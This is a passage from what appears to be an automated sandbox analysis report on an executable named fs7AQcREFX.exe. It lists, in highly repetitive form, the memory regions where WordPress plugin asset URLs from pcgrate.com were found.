00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.8
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/css/gpls_woo_rfq.css?v
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.3.7
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.jquery.min.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.min.css?ver
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.3.7
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.
